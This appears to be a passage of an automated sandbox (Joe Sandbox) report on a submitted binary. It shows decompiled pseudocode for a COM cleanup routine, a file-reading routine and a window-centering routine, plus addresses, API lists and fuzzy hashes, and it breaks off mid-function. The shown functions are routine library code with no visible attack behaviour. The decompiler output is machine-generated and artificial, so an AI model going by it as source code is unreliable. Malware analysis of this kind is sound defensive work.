                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040FD5E, Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E0040FD5E(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E004128A0(E0043121D, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x44ad44;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x44df9c);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x44e0dc);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E004230D7(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E0040EE3B(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E0040B246( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E0040B246(_t162);
							_push(_t162);
							L0042446B(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E0040FAE0(_t163, _t196);
							_push(_t163);
							L0042446B(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E004231BF( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E00409D70(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E004230D7( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L0042446B(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L0042446B(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}


























                                                                              0x0040fd5e
                                                                              0x0040fd63
                                                                              0x0040fd6d
                                                                              0x0040fd6f
                                                                              0x0040fd72
                                                                              0x0040fd7d
                                                                              0x0040fd80
                                                                              0x0040fd82
                                                                              0x0040fd87
                                                                              0x0040fd89
                                                                              0x0040fd90
                                                                              0x0040fd91
                                                                              0x0040fd96
                                                                              0x0040fd9b
                                                                              0x0040fd9d
                                                                              0x0040fda3
                                                                              0x0040fda4
                                                                              0x0040fda9
                                                                              0x0040fdae
                                                                              0x0040fdb4
                                                                              0x0040fdb6
                                                                              0x0040fdbf
                                                                              0x0040fdc2
                                                                              0x0040fdc8
                                                                              0x0040fdc8
                                                                              0x0040fdcb
                                                                              0x0040fdd1
                                                                              0x0040fdd1
                                                                              0x0040fd9b
                                                                              0x0040fd87
                                                                              0x0040fdd4
                                                                              0x0040fdf3
                                                                              0x0040fdf6
                                                                              0x0040fdda
                                                                              0x0040fde5
                                                                              0x0040fded
                                                                              0x00000000
                                                                              0x0040fded
                                                                              0x0040fdfb
                                                                              0x0040fdfe
                                                                              0x0040fe06
                                                                              0x0040fe40
                                                                              0x0040fe40
                                                                              0x0040fe45
                                                                              0x0040fe4a
                                                                              0x0040fe4a
                                                                              0x0040fe4d
                                                                              0x0040fe52
                                                                              0x0040fe57
                                                                              0x0040fe57
                                                                              0x0040fe5d
                                                                              0x0040fecc
                                                                              0x0040fecc
                                                                              0x0040fed1
                                                                              0x0040fed4
                                                                              0x0040fed4
                                                                              0x0040feda
                                                                              0x0040fedf
                                                                              0x0040fee6
                                                                              0x0040feee
                                                                              0x0040feee
                                                                              0x0040fef3
                                                                              0x0040fef6
                                                                              0x0040fef8
                                                                              0x0040fefc
                                                                              0x0040ff01
                                                                              0x0040ff02
                                                                              0x0040ff07
                                                                              0x0040ff08
                                                                              0x0040ff0b
                                                                              0x0040ff0d
                                                                              0x0040ff11
                                                                              0x0040ff16
                                                                              0x0040ff17
                                                                              0x0040ff1c
                                                                              0x0040ff1d
                                                                              0x0040ff23
                                                                              0x0040ff28
                                                                              0x0040ff28
                                                                              0x0040ff2b
                                                                              0x0040ff30
                                                                              0x0040ff35
                                                                              0x0040ff35
                                                                              0x0040ff3b
                                                                              0x0040ff3f
                                                                              0x0040ff49
                                                                              0x0040ff51
                                                                              0x0040fe5f
                                                                              0x0040fe62
                                                                              0x0040fe65
                                                                              0x0040fec3
                                                                              0x0040fec6
                                                                              0x00000000
                                                                              0x0040fec6
                                                                              0x0040fe67
                                                                              0x0040fe69
                                                                              0x0040fe70
                                                                              0x0040fe75
                                                                              0x0040fe78
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040fe7a
                                                                              0x0040fe7a
                                                                              0x0040fe8f
                                                                              0x0040fe8f
                                                                              0x0040fe97
                                                                              0x0040fe9e
                                                                              0x0040fea6
                                                                              0x0040feac
                                                                              0x0040feb2
                                                                              0x0040feb2
                                                                              0x0040feb5
                                                                              0x0040febb
                                                                              0x0040febe
                                                                              0x00000000
                                                                              0x0040fe69
                                                                              0x0040fe5d
                                                                              0x0040fe08
                                                                              0x0040fe0d
                                                                              0x0040fe2c
                                                                              0x0040fe2c
                                                                              0x0040fe2e
                                                                              0x0040fe31
                                                                              0x0040fe36
                                                                              0x0040fe39
                                                                              0x0040fe3f
                                                                              0x00000000
                                                                              0x0040fe2c
                                                                              0x0040fe0f
                                                                              0x0040fe12
                                                                              0x0040fe19
                                                                              0x0040fe1f
                                                                              0x0040fe23
                                                                              0x0040fe24
                                                                              0x0040fe29
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FreeTask$ClearH_prologVariant
                                                                              • String ID:
                                                                              • API String ID: 82050969-0
                                                                              • Opcode ID: 3a143527f614caeb7e7730fd3bf0f55a118291347b53d119de88ce97be427d2c
                                                                              • Instruction ID: cb6c129e7678bd8cc6b55dbe0d46a684bcb0eda1608f896789917ea28fa2f24b
                                                                              • Opcode Fuzzy Hash: 3a143527f614caeb7e7730fd3bf0f55a118291347b53d119de88ce97be427d2c
                                                                              • Instruction Fuzzy Hash: D0713671A00606DFCB20DFA5C98492AB7F2FF48304754097EE146A7AA2CB38EC45CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E1DB, Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041E1DB(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x45bb20 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E0041C832(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E0041420C(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E004141FA())) = 9;
					_t107 = E00414203();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                              0x0041e1e1
                                                                              0x0041e1ea
                                                                              0x0041e1ef
                                                                              0x0041e1f1
                                                                              0x0041e3af
                                                                              0x0041e3af
                                                                              0x00000000
                                                                              0x0041e3af
                                                                              0x0041e1f7
                                                                              0x0041e205
                                                                              0x0041e20e
                                                                              0x0041e211
                                                                              0x0041e213
                                                                              0x0041e219
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e222
                                                                              0x0041e230
                                                                              0x0041e233
                                                                              0x0041e237
                                                                              0x0041e23a
                                                                              0x0041e241
                                                                              0x0041e241
                                                                              0x0041e25d
                                                                              0x0041e298
                                                                              0x0041e29b
                                                                              0x0041e29d
                                                                              0x0041e2a0
                                                                              0x0041e2a5
                                                                              0x0041e3aa
                                                                              0x00000000
                                                                              0x0041e3aa
                                                                              0x0041e2ab
                                                                              0x0041e2ad
                                                                              0x0041e2bf
                                                                              0x0041e2c1
                                                                              0x0041e2c5
                                                                              0x0041e2c5
                                                                              0x0041e2c8
                                                                              0x0041e2c8
                                                                              0x0041e2ce
                                                                              0x0041e2d0
                                                                              0x0041e2d2
                                                                              0x0041e2d5
                                                                              0x0041e2d8
                                                                              0x0041e3a4
                                                                              0x0041e3a4
                                                                              0x0041e3a4
                                                                              0x0041e3a7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2de
                                                                              0x0041e2de
                                                                              0x0041e2e1
                                                                              0x0041e2e3
                                                                              0x0041e2e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2eb
                                                                              0x0041e2ed
                                                                              0x0041e2fb
                                                                              0x0041e2fe
                                                                              0x0041e314
                                                                              0x0041e328
                                                                              0x0041e32e
                                                                              0x0041e330
                                                                              0x0041e33c
                                                                              0x0041e33c
                                                                              0x0041e340
                                                                              0x0041e382
                                                                              0x0041e382
                                                                              0x0041e385
                                                                              0x0041e385
                                                                              0x0041e385
                                                                              0x0041e386
                                                                              0x0041e386
                                                                              0x0041e389
                                                                              0x0041e38c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e392
                                                                              0x0041e342
                                                                              0x0041e344
                                                                              0x0041e349
                                                                              0x0041e35d
                                                                              0x0041e360
                                                                              0x0041e36d
                                                                              0x0041e374
                                                                              0x0041e379
                                                                              0x0041e37c
                                                                              0x0041e380
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e380
                                                                              0x0041e362
                                                                              0x0041e366
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e368
                                                                              0x0041e368
                                                                              0x00000000
                                                                              0x0041e368
                                                                              0x0041e34b
                                                                              0x0041e34e
                                                                              0x0041e350
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e352
                                                                              0x0041e357
                                                                              0x00000000
                                                                              0x0041e357
                                                                              0x0041e332
                                                                              0x0041e338
                                                                              0x0041e33a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e33a
                                                                              0x0041e303
                                                                              0x0041e304
                                                                              0x0041e307
                                                                              0x0041e30f
                                                                              0x00000000
                                                                              0x0041e30f
                                                                              0x0041e309
                                                                              0x00000000
                                                                              0x0041e309
                                                                              0x0041e2ef
                                                                              0x0041e2f1
                                                                              0x0041e2f2
                                                                              0x00000000
                                                                              0x0041e2f2
                                                                              0x0041e394
                                                                              0x0041e396
                                                                              0x0041e39b
                                                                              0x0041e39d
                                                                              0x0041e3a1
                                                                              0x0041e3a1
                                                                              0x0041e3a1
                                                                              0x00000000
                                                                              0x0041e39b
                                                                              0x0041e2af
                                                                              0x0041e2b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e2ba
                                                                              0x00000000
                                                                              0x0041e25f
                                                                              0x0041e25f
                                                                              0x0041e267
                                                                              0x0041e26a
                                                                              0x0041e280
                                                                              0x0041e283
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041e28a
                                                                              0x0041e290
                                                                              0x00000000
                                                                              0x0041e290
                                                                              0x0041e271
                                                                              0x0041e277
                                                                              0x0041e27c
                                                                              0x00000000
                                                                              0x0041e27c

                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,0044C3B0,?,?), ref: 0041E255
                                                                              • GetLastError.KERNEL32 ref: 0041E25F
                                                                              • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041E328
                                                                              • GetLastError.KERNEL32 ref: 0041E332
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
                                                                              • Opcode ID: d5626c89196841c975677f9fe0405f4ed7f6318b0b1d247cbc0b4242e5a74cf5
                                                                              • Instruction ID: c2ec8804dca23fd16efb83461666c81868fedb357b026b5ad42fe2558f67134d
                                                                              • Opcode Fuzzy Hash: d5626c89196841c975677f9fe0405f4ed7f6318b0b1d247cbc0b4242e5a74cf5
                                                                              • Instruction Fuzzy Hash: 0361A138604389DFDB218F59C884BEA7BA4AF06304F14419AEC658B291D378DAC5CB5A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040F93E, Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E0040F93E(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr _t137;
				void* _t138;

				_t126 = __edx;
				_t136 = __ecx;
				_t130 = E004270C8( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E00426406(_t138, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E004283E5(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E00428423(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
				_t131 = _t136 + 0x48;
				_push(_t131);
				_push(0x44ad30);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x44ac88,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t136 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x44ddac, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x44dd9c, _t136 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t135 = _t136 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x44e02c, _t135);
					if( *_t135 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t137 = E0040F4FE(_t136);
						if(_v24 != _t107) {
							E004283E5(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E00428423(_v12, _t107);
						}
						_t66 = _t137;
					} else {
						if(_v24 != _t107) {
							E004283E5(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E00428423(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}































                                                                              0x0040f93e
                                                                              0x0040f946
                                                                              0x0040f954
                                                                              0x0040f959
                                                                              0x0040f95c
                                                                              0x0040f964
                                                                              0x0040f966
                                                                              0x0040f969
                                                                              0x0040f96c
                                                                              0x0040f96d
                                                                              0x0040f982
                                                                              0x0040f98f
                                                                              0x0040f99c
                                                                              0x0040f9ac
                                                                              0x0040f9b2
                                                                              0x0040f9bb
                                                                              0x0040f9bb
                                                                              0x0040f9c3
                                                                              0x0040f9c8
                                                                              0x0040f9cb
                                                                              0x0040f9cc
                                                                              0x0040f9d1
                                                                              0x0040f9d6
                                                                              0x0040fa37
                                                                              0x0040fa46
                                                                              0x0040fa4a
                                                                              0x0040fa50
                                                                              0x0040fa5a
                                                                              0x0040fa5d
                                                                              0x0040fa63
                                                                              0x0040fa66
                                                                              0x0040fa6b
                                                                              0x0040fa76
                                                                              0x0040fa82
                                                                              0x0040fa85
                                                                              0x0040fa8b
                                                                              0x0040fa8e
                                                                              0x0040fa93
                                                                              0x0040fa95
                                                                              0x0040faa3
                                                                              0x00000000
                                                                              0x0040faa3
                                                                              0x0040fa6d
                                                                              0x0040fa6d
                                                                              0x0040fa6d
                                                                              0x0040fa6b
                                                                              0x0040f9d8
                                                                              0x0040f9d8
                                                                              0x0040f9dc
                                                                              0x0040f9ec
                                                                              0x0040f9ef
                                                                              0x0040f9f1
                                                                              0x0040f9f1
                                                                              0x0040f9fb
                                                                              0x0040faa5
                                                                              0x0040faaf
                                                                              0x0040fab1
                                                                              0x0040facb
                                                                              0x0040fad4
                                                                              0x0040fad4
                                                                              0x0040fad9
                                                                              0x0040fa01
                                                                              0x0040fa04
                                                                              0x0040fa1e
                                                                              0x0040fa27
                                                                              0x0040fa27
                                                                              0x0040fa2c
                                                                              0x0040fa2c
                                                                              0x0040f9fb
                                                                              0x0040fadf

                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0040F95C
                                                                              • GetDesktopWindow.USER32 ref: 0040F96F
                                                                              • GetWindowRect.USER32 ref: 0040F982
                                                                              • GetWindowRect.USER32 ref: 0040F98F
                                                                                • Part of subcall function 004283E5: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040FAD0,?,?), ref: 00428400
                                                                                • Part of subcall function 00428423: ShowWindow.USER32(?,?,0040FAD9,00000000,?,?), ref: 00428430
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$DesktopMoveShowVisible
                                                                              • String ID:
                                                                              • API String ID: 3835705305-0
                                                                              • Opcode ID: d773adab089a3fe7c9c66bc4d4f68c143d7e0cd7b6ea670bf85cb4ee9fbe8775
                                                                              • Instruction ID: aef8f7b5d96eaed2791679fdc5685ee1f7111264cda5d13848339e02a6c6130a
                                                                              • Opcode Fuzzy Hash: d773adab089a3fe7c9c66bc4d4f68c143d7e0cd7b6ea670bf85cb4ee9fbe8775
                                                                              • Instruction Fuzzy Hash: B3510975A0021AEFDB10DFA8D984DAEB7B9FF48304B14446EF506E7290CB79AD05CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415EFB, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E00415EFB(void* __ebx, char* __ecx, signed int __edx, void* __edi, void* __esi) {
				void* __ebp;
				intOrPtr _t35;
				intOrPtr _t36;
